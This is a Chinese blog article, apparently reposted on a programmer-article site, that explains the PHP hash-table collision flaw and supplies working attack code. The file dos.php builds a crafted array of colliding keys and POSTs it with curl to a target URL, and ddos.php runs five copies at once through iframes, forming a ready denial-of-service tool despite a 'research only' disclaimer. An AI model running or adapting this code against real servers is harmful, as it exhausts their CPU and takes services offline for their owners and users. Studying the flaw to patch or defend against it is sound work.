PHP利用hash冲突漏洞进行DDoS攻击的方法分析
程序员文章站
2022-12-25 08:20:27
本文实例分析了php利用hash冲突漏洞进行ddos攻击的方法。分享给大家供大家参考。具体分析如下:
首先声明:本文内容只用于研究学习使用,请勿用于非法行为!
前面提到...
本文实例分析了php利用hash冲突漏洞进行ddos攻击的方法。分享给大家供大家参考。具体分析如下:
首先声明:本文内容只用于研究学习使用,请勿用于非法行为!
前面提到过最近爆出的hash表碰撞漏洞,包括java、python、php等在内的很多常用语言均未幸免,今晚咱就来实际看看它的威力。
攻击原理:
通过向目标服务器post一组精心拼凑的数组参数,到达服务端后语言底层处理接收到的数组参数时,由于该漏洞的存在造成cpu的大量消耗,最终导致服务器资源耗尽。
不用什么花哨的手法,就用php简单实现下看下效果,点到即止。
文件:dos.php
// 目标地址 // 只要目标地址存在,不用管它是干嘛的 $host = 'http://127.0.0.1/test.php'; $data = ''; $size = pow(2, 15); for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size) { $data .= '&array[' . $key . ']=0'; } $ret = curl($host, ltrim($data,'&')); var_dump($ret); function curl($url, $post, $timeout = 30){ $ch = curl_init(); curl_setopt($ch, curlopt_returntransfer, true); curl_setopt($ch, curlopt_timeout, $timeout); curl_setopt($ch, curlopt_connecttimeout, $timeout - 5); curl_setopt($ch, curlopt_httpheader, array('expect:')); curl_setopt($ch, curlopt_url, $url); curl_setopt($ch, curlopt_post, true); curl_setopt($ch, curlopt_postfields, $post); $output = curl_exec($ch); if ($output === false) return false; $info = curl_getinfo($ch); $http_code = $info['http_code']; if ($http_code == 404) return false; curl_close($ch); return $output; }
文件:ddos.php
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=gb2312" /> <title>ddos</title> </head> <body> <?php for($i=0; $i<5; $i++){//并发数 echo '<iframe src="dos.php?a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>'; } ?> </body> </html>
希望本文所述对大家的php程序设计有所帮助。
上一篇: 搞笑漫画图片夫妻漫画
下一篇: 我的程序人生(下)